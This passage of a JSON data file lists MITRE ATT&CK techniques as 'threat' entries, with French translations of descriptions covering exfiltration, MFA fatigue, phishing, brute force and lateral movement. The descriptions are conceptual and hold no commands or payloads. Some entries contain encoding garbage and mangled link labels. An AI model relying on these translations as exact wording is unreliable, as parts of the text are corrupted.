utilis\u00e9 pour se d\u00e9placer lat\u00e9ralement vers d\u2019autres syst\u00e8mes, collecter des informations ou provoquer un effet sp\u00e9cifique, tel que l\u2019effacement des disques durs sur tous les terminaux. Les autorisations requises pour cette action varient selon la configuration du syst\u00e8me ; Les informations d\u2019identification locales peuvent \u00eatre suffisantes avec un acc\u00e8s direct au syst\u00e8me tiers, ou des informations d\u2019identification de domaine sp\u00e9cifiques peuvent \u00eatre requises. Cependant, le syst\u00e8me peut n\u00e9cessiter un compte administratif pour se connecter ou pour remplir son objectif.\nhttps://attack.mitre.org/techniques/T1072\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1041 - Exfiltration sur canal C2", - "description": "Les adversaires peuvent voler des donn\u00e9es en les exfiltrant sur un canal de commande et de contr\u00f4le existant. Les donn\u00e9es vol\u00e9es sont cod\u00e9es dans le canal de communication normal en utilisant le m\u00eame protocole que les communications de commande et de contr\u00f4le.\nhttps://attack.mitre.org/techniques/T1041\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1591 - Recueillir des informations sur l\u2019organisation des victimes", - "description": "Les adversaires peuvent recueillir des informations sur l\u2019organisation de la victime qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les informations sur une organisation peuvent inclure une vari\u00e9t\u00e9 de d\u00e9tails, y compris les noms des divisions / d\u00e9partements, les d\u00e9tails des op\u00e9rations commerciales, ainsi que les r\u00f4les et les responsabilit\u00e9s des employ\u00e9s cl\u00e9s. Les adversaires peuvent recueillir ces informations de diverses mani\u00e8res, par exemple en d\u00e9clenchant directement l\u2019obtention de [Hame\u00e7onnage \u00e0 l\u2019information](https://attack.mitre.org/techniques/T1598). Les renseignements sur une organisation peuvent \u00e9galement \u00eatre expos\u00e9s \u00e0 des adversaires par l\u2019entremise d\u2019ensembles de donn\u00e9es en ligne ou d\u2019autres ensembles de donn\u00e9es accessibles (p. ex. : [M\u00e9dias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Recherche sur des sites Web appartenant aux victimes](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite de ThreatPost Broadvoice) (R\u00e9f\u00e9rence : SEC EDGAR Search) La collecte de ces renseignements peut r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex., [Hame\u00e7onnage \u00e0 des fins d\u2019information](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex. [\u00c9tablir des comptes](https://attack.mitre.org/techniques/T1585) ou [Comptes compromis] (https://attack.mitre.org/techniques/T1586)), et/ou d\u2019acc\u00e8s initial (p. ex. : [Hame\u00e7onnage]( https://attack.mitre.org/techniques/T1566) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1591\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1606 - Forger les informations d\u2019identification Web", - "description": "Les adversaires peuvent falsifier des documents d\u2019accr\u00e9ditation qui peuvent \u00eatre utilis\u00e9s pour acc\u00e9der \u00e0 des applications Web ou \u00e0 des services Internet. Les applications et services Web (h\u00e9berg\u00e9s dans des environnements SaaS cloud ou des serveurs sur site) utilisent souvent des cookies de session, des jetons ou d\u2019autres documents pour authentifier et autoriser l\u2019acc\u00e8s des utilisateurs. Les adversaires peuvent g\u00e9n\u00e9rer ces documents d\u2019accr\u00e9ditation afin d\u2019acc\u00e9der aux ressources Web. Cela diff\u00e8re de [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) et d\u2019autres comportements similaires en ce sens que les informations d\u2019identification sont nouvelles et falsifi\u00e9es par l\u2019adversaire, plut\u00f4t que vol\u00e9es ou intercept\u00e9es par des utilisateurs l\u00e9gitimes. La g\u00e9n\u00e9ration d\u2019informations d\u2019identification Web n\u00e9cessite souvent des valeurs secr\u00e8tes, telles que des mots de passe, [Private Keys](https://attack.mitre.org/techniques/T1552/004) ou d\u2019autres valeurs de d\u00e9part cryptographiques. (Citation : GitHub AWS-ADFS-Credential-Generator) Les adversaires peuvent \u00e9galement falsifier des jetons en tirant parti de fonctionnalit\u00e9s telles que les API \u00ab AssumeRole \u00bb et \u00ab GetFederationToken \u00bb dans AWS, qui permettent aux utilisateurs de demander des informations d\u2019identification de s\u00e9curit\u00e9 temporaires. (R\u00e9f\u00e9rence : Informations d\u2019identification de s\u00e9curit\u00e9 temporaires AWS) Une fois falsifi\u00e9es, les adversaires peuvent utiliser ces informations d\u2019identification Web pour acc\u00e9der aux ressources (ex: [Utiliser un autre mat\u00e9riel d\u2019authentification](https://attack.mitre.org/techniques/T1550)), ce qui peut contourner les m\u00e9canismes de protection multifacteurs et autres m\u00e9canismes de protection de l\u2019authentification. (Citation: Pass The Cookie) (Citation: Unit\u00e9 42 Mac Crypto Cookies Janvier 2019) (Citation : Guide client Microsoft SolarWinds)\nhttps://attack.mitre.org/techniques/T1606\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1621 - G\u00e9n\u00e9ration de demandes d\u2019authentification multifacteur", - "description": "Les adversaires peuvent tenter de contourner les m\u00e9canismes d\u2019authentification multifacteur (MFA) et d\u2019acc\u00e9der aux comptes en g\u00e9n\u00e9rant des demandes MFA envoy\u00e9es aux utilisateurs. Les adversaires en possession d\u2019informations d\u2019identification pour [Comptes valides](https://attack.mitre.org/techniques/T1078) peuvent ne pas \u00eatre en mesure de terminer le processus de connexion s\u2019ils n\u2019ont pas acc\u00e8s aux m\u00e9canismes 2FA ou MFA requis en tant qu\u2019informations d\u2019identification suppl\u00e9mentaires et contr\u00f4le de s\u00e9curit\u00e9. Pour contourner ce probl\u00e8me, les adversaires peuvent abuser de la g\u00e9n\u00e9ration automatique de notifications push vers des services MFA tels que Duo Push, Microsoft Authenticator, Okta ou des services similaires pour que l\u2019utilisateur accorde l\u2019acc\u00e8s \u00e0 son compte. Dans certains cas, les adversaires peuvent continuellement r\u00e9p\u00e9ter les tentatives de connexion afin de bombarder les utilisateurs de notifications push MFA, de messages SMS et d\u2019appels t\u00e9l\u00e9phoniques, ce qui peut amener l\u2019utilisateur \u00e0 accepter finalement la demande d\u2019authentification en r\u00e9ponse \u00e0 la \u00ab\u00a0fatigue \u00c4\u00faMFA\u00a0\u00bb.\nhttps://attack.mitre.org/techniques/T1621\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1554 - Binaire logiciel client de compromis", - "description": "Les adversaires peuvent modifier les fichiers binaires du logiciel client pour \u00e9tablir un acc\u00e8s permanent aux syst\u00e8mes. Le logiciel client permet aux utilisateurs d\u2019acc\u00e9der aux services fournis par un serveur. Les types de logiciels clients courants sont les clients SSH, les clients FTP, les clients de messagerie et les navigateurs Web. Les adversaires peuvent apporter des modifications aux fichiers binaires du logiciel client pour effectuer des t\u00e2ches malveillantes lorsque ces applications sont utilis\u00e9es. Par exemple, un adversaire peut copier le code source du logiciel client, ajouter une porte d\u00e9rob\u00e9e, compiler pour la cible et remplacer le binaire d\u2019application l\u00e9gitime (ou les fichiers de support) par le binaire de la porte d\u00e9rob\u00e9e. \u00c9tant donn\u00e9 que ces applications peuvent \u00eatre ex\u00e9cut\u00e9es r\u00e9guli\u00e8rement par l\u2019utilisateur, l\u2019adversaire peut en tirer parti pour un acc\u00e8s persistant \u00e0 l\u2019h\u00f4te.\nhttps://attack.mitre.org/techniques/T1554\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1212 - Exploitation pour l\u2019acc\u00e8s aux informations d\u2019identification", - "description": "Les adversaires peuvent exploiter les vuln\u00e9rabilit\u00e9s logicielles pour tenter de collecter des informations d\u2019identification. L\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 logicielle se produit lorsqu\u2019un adversaire profite d\u2019une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du syst\u00e8me d\u2019exploitation lui-m\u00eame pour ex\u00e9cuter du code contr\u00f4l\u00e9 par l\u2019adversaire.\u00ac\u2020Les m\u00e9canismes d\u2019accr\u00e9ditation et d\u2019authentification peuvent \u00eatre cibl\u00e9s pour \u00eatre exploit\u00e9s par des adversaires comme moyen d\u2019acc\u00e9der \u00e0 des informations d\u2019identification utiles ou de contourner le processus d\u2019acc\u00e8s aux syst\u00e8mes. Un exemple de ceci est MS14-068, qui cible Kerberos et peut \u00eatre utilis\u00e9 pour falsifier des tickets Kerberos \u00e0 l\u2019aide d\u2019autorisations d\u2019utilisateur de domaine. (R\u00e9f\u00e9rence : Technet MS14-068) (Citation : ADSecurity Detection Fald Tickets) L\u2019exploitation pour l\u2019acc\u00e8s aux informations d\u2019identification peut \u00e9galement entra\u00eener une escalade des privil\u00e8ges en fonction du processus cibl\u00e9 ou des informations d\u2019identification obtenues.\nhttps://attack.mitre.org/techniques/T1212\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1590 - Recueillir de l\u2019information sur le r\u00e9seau des victimes", - "description": "Les adversaires peuvent recueillir des informations sur les r\u00e9seaux de la victime qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les informations sur les r\u00e9seaux peuvent inclure une vari\u00e9t\u00e9 de d\u00e9tails, y compris des donn\u00e9es administratives (par exemple, plages IP, noms de domaine, etc.) ainsi que des d\u00e9tails concernant sa topologie et ses op\u00e9rations. Les adversaires peuvent recueillir ces informations de diff\u00e9rentes mani\u00e8res, telles que des actions de collecte directe via [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Hame\u00e7onnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations sur les r\u00e9seaux peuvent \u00e9galement \u00eatre expos\u00e9es \u00e0 des adversaires via des ensembles de donn\u00e9es en ligne ou d\u2019autres ensembles de donn\u00e9es accessibles (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)). (R\u00e9f\u00e9rence : WHOIS) (Citation: DNS Dumpster) (Citation : Circl Passive DNS) La collecte de ces informations peut r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex., [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex., [Acquisition de l\u2019infrastructure](https://attack.mitre.org/techniques/T1583) ou [Infrastructure compromise](https://attack.mitre.org/techniques/T1584)), et/ou d\u2019acc\u00e8s initial (p. ex. : [Approuv\u00e9] Relation](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1590\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1210 - Exploitation des services \u00e0 distance", - "description": "Les adversaires peuvent exploiter les services distants pour obtenir un acc\u00e8s non autoris\u00e9 aux syst\u00e8mes internes une fois \u00e0 l\u2019int\u00e9rieur d\u2019un r\u00e9seau. L\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 logicielle se produit lorsqu\u2019un adversaire tire parti d\u2019une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du syst\u00e8me d\u2019exploitation lui-m\u00eame pour ex\u00e9cuter du code contr\u00f4l\u00e9 par l\u2019adversaire.\u00ac\u2020Un objectif commun pour l\u2019exploitation post-compromission des services distants est que le mouvement lat\u00e9ral permette l\u2019acc\u00e8s \u00e0 un syst\u00e8me distant. Un adversaire peut avoir besoin de d\u00e9terminer si le syst\u00e8me distant est dans un \u00e9tat vuln\u00e9rable, ce qui peut \u00eatre fait via [Network Service Discovery](https://attack.mitre.org/techniques/T1046) ou d\u2019autres m\u00e9thodes de d\u00e9couverte \u00e0 la recherche de logiciels communs et vuln\u00e9rables qui peuvent \u00eatre d\u00e9ploy\u00e9s sur le r\u00e9seau, l\u2019absence de certains correctifs pouvant indiquer des vuln\u00e9rabilit\u00e9s ou un logiciel de s\u00e9curit\u00e9 pouvant \u00eatre utilis\u00e9 pour d\u00e9tecter ou contenir l\u2019exploitation \u00e0 distance. Les serveurs sont probablement une cible de grande valeur pour l\u2019exploitation des mouvements lat\u00e9raux, mais les syst\u00e8mes de point de terminaison peuvent \u00e9galement \u00eatre \u00e0 risque s\u2019ils offrent un avantage ou un acc\u00e8s \u00e0 des ressources suppl\u00e9mentaires. Il existe plusieurs vuln\u00e9rabilit\u00e9s bien connues qui existent dans les services communs tels que SMB (Citation: CIS Multiple SMB Vulnerabilities) et RDP (Citation: NVD CVE-2017-0176) ainsi que des applications qui peuvent \u00eatre utilis\u00e9es dans des r\u00e9seaux internes tels que MySQL (Citation: NVD CVE-2016-6662) et les services de serveur Web. (R\u00e9f\u00e9rence : NVD CVE-2014-7169) Selon le niveau d\u2019autorisation du service distant vuln\u00e9rable, un adversaire peut \u00e9galement atteindre [Exploitation pour l\u2019escalade des privil\u00e8ges](https://attack.mitre.org/techniques/T1068) \u00e0 la suite de l\u2019exploitation des mouvements lat\u00e9raux.\nhttps://attack.mitre.org/techniques/T1210\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1534 - Spearphishing interne", - "description": "Les adversaires peuvent utiliser le spearphishing interne pour acc\u00e9der \u00e0 des informations suppl\u00e9mentaires ou exploiter d\u2019autres utilisateurs au sein de la m\u00eame organisation apr\u00e8s avoir d\u00e9j\u00e0 acc\u00e8s \u00e0 des comptes ou \u00e0 des syst\u00e8mes dans l\u2019environnement. Le spearphishing interne est une campagne en plusieurs \u00e9tapes dans laquelle un compte de messagerie appartient soit en contr\u00f4lant l\u2019appareil de l\u2019utilisateur avec des logiciels malveillants pr\u00e9c\u00e9demment install\u00e9s, soit en compromettant les informations d\u2019identification du compte de l\u2019utilisateur. Les adversaires tentent de tirer parti d\u2019un compte interne fiable pour augmenter la probabilit\u00e9 de tromper la cible pour qu\u2019elle tombe dans le pi\u00e8ge de la tentative d\u2019hame\u00e7onnage. (Citation : Trend Micro When Phishing Starts from the Inside 2017) Les adversaires peuvent utiliser [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) ou [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) dans le cadre du spearphishing interne pour fournir une charge utile ou rediriger vers un site externe afin de capturer les informations d\u2019identification via [Input Capture](https://attack.mitre.org/techniques/T1056) sur des sites qui imitent les interfaces de connexion par e-mail. Il y a eu des incidents notables o\u00f9 le harponnage interne a \u00e9t\u00e9 utilis\u00e9. La campagne Eye Pyramid a utilis\u00e9 des e-mails de phishing avec des pi\u00e8ces jointes malveillantes pour les mouvements lat\u00e9raux entre les victimes, compromettant ainsi pr\u00e8s de 18 000 comptes de messagerie. (Citation : Trend Micro When Phishing Starts from the Inside 2017) L\u2019arm\u00e9e \u00e9lectronique syrienne (SEA) a compromis les comptes de messagerie du Financial Times (FT) pour voler des informations d\u2019identification de compte suppl\u00e9mentaires. Une fois que FT a appris l\u2019existence de la campagne et a commenc\u00e9 \u00e0 avertir les employ\u00e9s de la menace, le SEA a envoy\u00e9 des e-mails de phishing imitant le service informatique du Financial Times et a pu compromettre encore plus d\u2019utilisateurs. (Citation: THE FINANCIAL TIMES LTD 2019.)\nhttps://attack.mitre.org/techniques/T1534\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1199 - Relation de confiance", - "description": "Les adversaires peuvent violer ou autrement tirer parti des organisations qui ont acc\u00e8s aux victimes vis\u00e9es. L\u2019acc\u00e8s par le biais d\u2019une relation de tiers de confiance abuse d\u2019une connexion existante qui peut ne pas \u00eatre prot\u00e9g\u00e9e ou qui fait l\u2019objet d\u2019un examen moins minutieux que les m\u00e9canismes standard d\u2019acc\u00e8s \u00e0 un r\u00e9seau. Les organisations accordent souvent un acc\u00e8s \u00e9lev\u00e9 \u00e0 des fournisseurs externes secondaires ou tiers afin de leur permettre de g\u00e9rer les syst\u00e8mes internes ainsi que les environnements bas\u00e9s sur le cloud. Quelques exemples de ces relations comprennent les entrepreneurs de services de TI, les fournisseurs de s\u00e9curit\u00e9 g\u00e9r\u00e9e, les entrepreneurs d\u2019infrastructure (p. ex. CVC, ascenseurs, s\u00e9curit\u00e9 physique). L\u2019acc\u00e8s du fournisseur tiers peut \u00eatre destin\u00e9 \u00e0 \u00eatre limit\u00e9 \u00e0 l\u2019infrastructure maintenue, mais peut exister sur le m\u00eame r\u00e9seau que le reste de l\u2019entreprise. En tant que tels, les [comptes valides](https://attack.mitre.org/techniques/T1078) utilis\u00e9s par l\u2019autre partie pour acc\u00e9der aux syst\u00e8mes de r\u00e9seau interne peuvent \u00eatre compromis et utilis\u00e9s. (Citation : Fournisseurs de services informatiques de la CISA) Dans les environnements Office 365, les organisations peuvent accorder aux partenaires Microsoft ou aux revendeurs des autorisations d\u2019administrateur d\u00e9l\u00e9gu\u00e9. En compromettant un compte partenaire ou revendeur, un adversaire peut \u00eatre en mesure de tirer parti des relations d\u2019administrateur d\u00e9l\u00e9gu\u00e9 existantes ou d\u2019envoyer de nouvelles offres d\u2019administrateur d\u00e9l\u00e9gu\u00e9 aux clients afin d\u2019obtenir un contr\u00f4le administratif sur le locataire victime. (R\u00e9f\u00e9rence : Administration d\u00e9l\u00e9gu\u00e9e Office 365)\nhttps://attack.mitre.org/techniques/T1199\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1593 - Rechercher des sites Web/domaines ouverts", - "description": "Les adversaires peuvent rechercher gratuitement sur des sites Web et/ou des domaines des informations sur les victimes qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Des informations sur les victimes peuvent \u00eatre disponibles sur divers sites en ligne, tels que les m\u00e9dias sociaux, les nouveaux sites ou ceux qui h\u00e9bergent des informations sur les op\u00e9rations commerciales telles que l\u2019embauche ou les contrats demand\u00e9s / r\u00e9compens\u00e9s. (Citation : Cyware Social Media) (Citation: SecurityTrails Google Hacking) (Citation: ExploitDB GoogleHacking) Les adversaires peuvent effectuer des recherches sur diff\u00e9rents sites en ligne en fonction des informations qu\u2019ils cherchent \u00e0 recueillir. Les informations provenant de ces sources peuvent r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (ex: [Hame\u00e7onnage pour information](https://attack.mitre.org/techniques/T1598) ou [Recherche dans les bases de donn\u00e9es techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (ex: [\u00c9tablir des comptes](https://attack.mitre.org/techniques/T1585) ou [Comptes compromis](https://attack.mitre.org/techniques/T1586)), et/ou d\u2019acc\u00e8s initial (ex: [Distant externe Services](https://attack.mitre.org/techniques/T1133) ou [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566)).\nhttps://attack.mitre.org/techniques/T1593\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1098 - Manipulation de compte", - "description": "Les adversaires peuvent manipuler les comptes pour maintenir l\u2019acc\u00e8s aux syst\u00e8mes des victimes. La manipulation de compte peut consister en toute action qui pr\u00e9serve l\u2019acc\u00e8s de l\u2019adversaire \u00e0 un compte compromis, telle que la modification des informations d\u2019identification ou des groupes d\u2019autorisations. Ces actions peuvent \u00e9galement inclure une activit\u00e9 de compte con\u00e7ue pour subvertir les strat\u00e9gies de s\u00e9curit\u00e9, telles que l\u2019ex\u00e9cution de mises \u00e0 jour it\u00e9ratives de mots de passe pour contourner les strat\u00e9gies de dur\u00e9e de mot de passe et pr\u00e9server la dur\u00e9e de vie des informations d\u2019identification compromises. Pour cr\u00e9er ou manipuler des comptes, l\u2019adversaire doit d\u00e9j\u00e0 disposer d\u2019autorisations suffisantes sur les syst\u00e8mes ou le domaine. Toutefois, la manipulation de compte peut \u00e9galement entra\u00eener une escalade des privil\u00e8ges lorsque les modifications accordent l\u2019acc\u00e8s \u00e0 des r\u00f4les suppl\u00e9mentaires, des autorisations ou des privil\u00e8ges plus \u00e9lev\u00e9s [comptes valides](https://attack.mitre.org/techniques/T1078).\nhttps://attack.mitre.org/techniques/T1098\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1048 - Exfiltration sur protocole alternatif", - "description": "Les adversaires peuvent voler des donn\u00e9es en les exfiltrant sur un protocole diff\u00e9rent de celui du canal de commande et de contr\u00f4le existant. Les donn\u00e9es peuvent \u00e9galement \u00eatre envoy\u00e9es \u00e0 un autre emplacement r\u00e9seau \u00e0 partir du serveur de commande et de contr\u00f4le principal. Les protocoles alternatifs incluent FTP, SMTP, HTTP/S, DNS, SMB ou tout autre protocole r\u00e9seau non utilis\u00e9 comme canal de commande et de contr\u00f4le principal. Les adversaires peuvent \u00e9galement choisir de chiffrer et/ou d\u2019obscurcir ces canaux alternatifs. [Exfiltration sur protocole alternatif] (https://attack.mitre.org/techniques/T1048) peut \u00eatre effectu\u00e9 \u00e0 l\u2019aide de divers utilitaires de syst\u00e8me d\u2019exploitation courants tels que [Net](https://attack.mitre.org/software/S0039)/SMB ou FTP. (Citation: Palo Alto OilRig octobre 2016) Sous macOS et Linux, curl peut \u00eatre utilis\u00e9 pour appeler des protocoles tels que HTTP/S ou FTP/S pour exfiltrer des donn\u00e9es d\u2019un syst\u00e8me. (Citation : 20 outils et techniques courants macOS) De nombreuses plateformes IaaS et SaaS (telles que Microsoft Exchange, Microsoft SharePoint, GitHub et AWS S3) prennent en charge le t\u00e9l\u00e9chargement direct de fichiers, d\u2019e-mails, de code source et d\u2019autres informations sensibles via la console Web ou [API cloud](https://attack.mitre.org/techniques/T1059/009).\nhttps://attack.mitre.org/techniques/T1048\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1597 - Recherche de sources ferm\u00e9es", - "description": "Les adversaires peuvent rechercher et recueillir des informations sur les victimes \u00e0 partir de sources ferm\u00e9es qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les informations sur les victimes peuvent \u00eatre disponibles \u00e0 l\u2019achat aupr\u00e8s de sources priv\u00e9es et de bases de donn\u00e9es r\u00e9put\u00e9es, telles que des abonnements payants \u00e0 des flux de donn\u00e9es techniques / de renseignements sur les menaces. (Citation : D3Secutrity CTI Feeds) Les adversaires peuvent \u00e9galement acheter des informations aupr\u00e8s de sources moins r\u00e9put\u00e9es telles que le dark web ou les march\u00e9s noirs de la cybercriminalit\u00e9. (Citation : Donn\u00e9es de vente ZDNET) Les adversaires peuvent effectuer des recherches dans diff\u00e9rentes bases de donn\u00e9es ferm\u00e9es en fonction des informations qu\u2019ils cherchent \u00e0 recueillir. L\u2019information provenant de ces sources peut r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex. : [Hame\u00e7onnage d\u2019informations](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex. : [Capacit\u00e9s de d\u00e9veloppement](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacit\u00e9s](https://attack.mitre.org/techniques/T1588)), et/ou d\u2019acc\u00e8s initial (p. ex. : [T\u00e9l\u00e9commande externe Services](https://attack.mitre.org/techniques/T1133) ou [Comptes valides](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1597\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1566 - Hame\u00e7onnage", - "description": "Les adversaires peuvent envoyer des messages d\u2019hame\u00e7onnage pour acc\u00e9der aux syst\u00e8mes des victimes. Toutes les formes d\u2019hame\u00e7onnage sont fournies par voie \u00e9lectronique d\u2019ing\u00e9nierie sociale. Le phishing peut \u00eatre cibl\u00e9, connu sous le nom de spearphishing. Dans le spearphishing, une personne, une entreprise ou une industrie sp\u00e9cifique sera cibl\u00e9e par l\u2019adversaire. Plus g\u00e9n\u00e9ralement, les adversaires peuvent mener des hame\u00e7onnages non cibl\u00e9s, comme dans le cadre de campagnes de spam de logiciels malveillants de masse. Les adversaires peuvent envoyer aux victimes des courriels contenant des pi\u00e8ces jointes ou des liens malveillants, g\u00e9n\u00e9ralement pour ex\u00e9cuter du code malveillant sur les syst\u00e8mes des victimes. L\u2019hame\u00e7onnage peut \u00e9galement \u00eatre effectu\u00e9 via des services tiers, tels que les plateformes de m\u00e9dias sociaux. L\u2019hame\u00e7onnage peut \u00e9galement impliquer des techniques d\u2019ing\u00e9nierie sociale, telles que se faire passer pour une source fiable, ainsi que des techniques d\u2019\u00e9vitement telles que la suppression ou la manipulation de courriels ou de m\u00e9tadonn\u00e9es/en-t\u00eates de comptes compromis utilis\u00e9s abusivement pour envoyer des messages (par exemple, [R\u00e8gles de dissimulation des e-mails](https://attack.mitre.org/techniques/T1564/008)). (Citation : Microsoft OAuth Spam 2022) (Citation: Palo Alto Unit 42 VBA Infostealer 2014) Une autre fa\u00e7on d\u2019y parvenir est de falsifier ou d\u2019usurper (Citation: Proofpoint-spoof) l\u2019identit\u00e9 de l\u2019exp\u00e9diteur qui peut \u00eatre utilis\u00e9e pour tromper \u00e0 la fois le destinataire humain ainsi que des outils de s\u00e9curit\u00e9 automatis\u00e9s. (Citation : cyberproof-double-bounce) Les victimes peuvent \u00e9galement recevoir des messages d\u2019hame\u00e7onnage qui leur demandent d\u2019appeler un num\u00e9ro de t\u00e9l\u00e9phone o\u00f9 elles sont invit\u00e9es \u00e0 visiter une URL malveillante, \u00e0 t\u00e9l\u00e9charger des logiciels malveillants, (Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) ou \u00e0 installer des outils de gestion \u00e0 distance accessibles \u00e0 l\u2019adversaire sur leur ordinateur (c\u2019est-\u00e0-dire [User Execution](https://attack.mitre.org/techniques/T1204)). (R\u00e9f\u00e9rence : Unit42 Luna Moth)\nhttps://attack.mitre.org/techniques/T1566\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1110 - Force brute", - "description": "Les adversaires peuvent utiliser des techniques de force brute pour acc\u00e9der aux comptes lorsque les mots de passe sont inconnus ou lorsque des hachages de mot de passe sont obtenus. Sans conna\u00eetre le mot de passe d\u2019un compte ou d\u2019un ensemble de comptes, un adversaire peut syst\u00e9matiquement deviner le mot de passe \u00e0 l\u2019aide d\u2019un m\u00e9canisme r\u00e9p\u00e9titif ou it\u00e9ratif. Les mots de passe de force brute peuvent avoir lieu via une interaction avec un service qui v\u00e9rifiera la validit\u00e9 de ces informations d\u2019identification ou hors ligne par rapport aux donn\u00e9es d\u2019informations d\u2019identification pr\u00e9c\u00e9demment acquises, telles que les hachages de mot de passe. Les informations d\u2019identification de for\u00e7age brutal peuvent avoir lieu \u00e0 diff\u00e9rents moments d\u2019une violation. Par exemple, les adversaires peuvent tenter de forcer brutalement l\u2019acc\u00e8s \u00e0 [Comptes valides](https://attack.mitre.org/techniques/T1078) dans un environnement de victime en tirant parti des connaissances acquises \u00e0 partir d\u2019autres comportements post-compromission tels que [Dumping des informations d\u2019identification du syst\u00e8me d\u2019exploitation](https://attack.mitre.org/techniques/T1003), [D\u00e9couverte de compte](https://attack.mitre.org/techniques/T1087) ou [D\u00e9couverte de strat\u00e9gie de mot de passe](https://attack.mitre.org/techniques/T1201). Les adversaires peuvent \u00e9galement combiner une activit\u00e9 de for\u00e7age brutal avec des comportements tels que [Services distants externes](https://attack.mitre.org/techniques/T1133) dans le cadre de l\u2019acc\u00e8s initial.\nhttps://attack.mitre.org/techniques/T1110\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1565 - Manipulation des donn\u00e9es", - "description": "Les adversaires peuvent ins\u00e9rer, supprimer ou manipuler des donn\u00e9es afin d\u2019influencer les r\u00e9sultats externes ou de masquer l\u2019activit\u00e9, mena\u00e7ant ainsi l\u2019int\u00e9grit\u00e9 des donn\u00e9es. En manipulant les donn\u00e9es, les adversaires peuvent tenter d\u2019affecter un processus m\u00e9tier, la compr\u00e9hension organisationnelle ou la prise de d\u00e9cision. Le type de modification et l\u2019impact qu\u2019elle aura d\u00e9pendent de l\u2019application et du processus cibles ainsi que des buts et objectifs de l\u2019adversaire. Pour les syst\u00e8mes complexes, un adversaire aurait probablement besoin d\u2019une expertise particuli\u00e8re et peut-\u00eatre d\u2019un acc\u00e8s \u00e0 un logiciel sp\u00e9cialis\u00e9 li\u00e9 au syst\u00e8me qui serait g\u00e9n\u00e9ralement obtenu par le biais d\u2019une campagne prolong\u00e9e de collecte d\u2019informations afin d\u2019avoir l\u2019impact souhait\u00e9.\nhttps://attack.mitre.org/techniques/T1565\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1559 - Communication inter-processus", - "description": "Les adversaires peuvent abuser des m\u00e9canismes de communication inter-processus (IPC) pour l\u2019ex\u00e9cution locale de code ou de commandes. IPC est g\u00e9n\u00e9ralement utilis\u00e9 par les processus pour partager des donn\u00e9es, communiquer entre eux ou synchroniser l\u2019ex\u00e9cution. IPC est \u00e9galement couramment utilis\u00e9 pour \u00e9viter des situations telles que les blocages, qui se produisent lorsque les processus sont bloqu\u00e9s dans un sch\u00e9ma d\u2019attente cyclique. Les adversaires peuvent abuser d\u2019IPC pour ex\u00e9cuter du code ou des commandes arbitraires. Les m\u00e9canismes de la CIB peuvent diff\u00e9rer selon le syst\u00e8me d\u2019exploitation, mais existent g\u00e9n\u00e9ralement sous une forme accessible via des langages/biblioth\u00e8ques de programmation ou des interfaces natives telles que Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) ou [Component Object 